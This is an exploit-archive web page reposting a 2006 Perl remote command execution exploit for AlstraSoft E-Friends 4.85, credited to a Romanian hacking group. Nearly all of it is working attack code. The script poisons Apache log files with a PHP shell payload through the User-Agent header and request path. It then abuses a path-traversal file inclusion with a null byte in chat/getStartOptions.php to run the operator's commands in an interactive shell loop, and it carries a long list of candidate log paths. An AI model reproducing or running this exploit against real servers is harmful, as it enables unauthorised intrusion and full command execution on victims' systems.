首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AlstraSoft E-Friends <= 4.85 Remote Command Execution Exploit
来源:http://RST-CREW.NET 作者:Kw3[R]Ln 发布时间:2006-09-19  

#!/usr/bin/perl
#
# AlstraSoft Efriends 4.85 Remote Command Execution Exploit
# Site : http://www.alstrasoft.com/efriends.htm
#
# Coded by Kw3[R]Ln from Romanian Security Team a.K.A http://RST-CREW.NET
# Contact: ciriboflacs@yahoo.com or kw3rln@rst-crew.net
#
# PS: fuck CarcaBot ..another lame romanian guy=))


use IO::Socket;
use LWP::Simple;

#ripped from rgod
@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);

print "[RST] AlstraSoft Efriends 4.85 Remote Command Execution Exploit\n";
print "[RST] need magic_quotes_gpc = off\n";
print "[RST] c0ded by Kw3[R]Ln from Romanian Security Team [ http://rst-crew.net ] \n\n";


if (@ARGV < 3)
{
print "[RST] Usage: efriends.pl [host] [path] [apache_path]\n\n";
print "[RST] Apache Path: \n";
$i = 0;
while($apache[$i])
{ print "[$i] $apache[$i]\n";$i++;}
exit();
}

$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];

print "[RST] Injecting some code in log files...\n";
$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "User-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "[RST] Shell!! write q to exit !\n";
print "[RST] IF not working try another apache path\n\n";

print "[shell] ";$cmd = <STDIN>;

while($cmd !~ "q") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n";

print $socket "GET ".$path."chat/getStartOptions.php?lang=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\n";

while ($raspuns = <$socket>)
{
print $raspuns;
}

print "[shell] ";
$cmd = <STDIN>;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Zix Forum <= 1.12 (RepId) R
·Php League <= 0.81 (config.
·Site@School <= 2.4.02 Advis
·MiniHttpServer Web Forum & Fil
·PHP DocWriter <= 0.3 (scrip
·MS Internet Explorer 7 Popup A
·Limbo CMS <= 1.0.4.2L (com_
·N/X WCMS <= 4.1 (nxheader.i
·X11R6 <= 6.4 XKEYBOARD Loca
·Light Blog Remote Multiple Vul
·MS Internet Explorer COM Objec
·MS Windows NAT Helper Componen
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved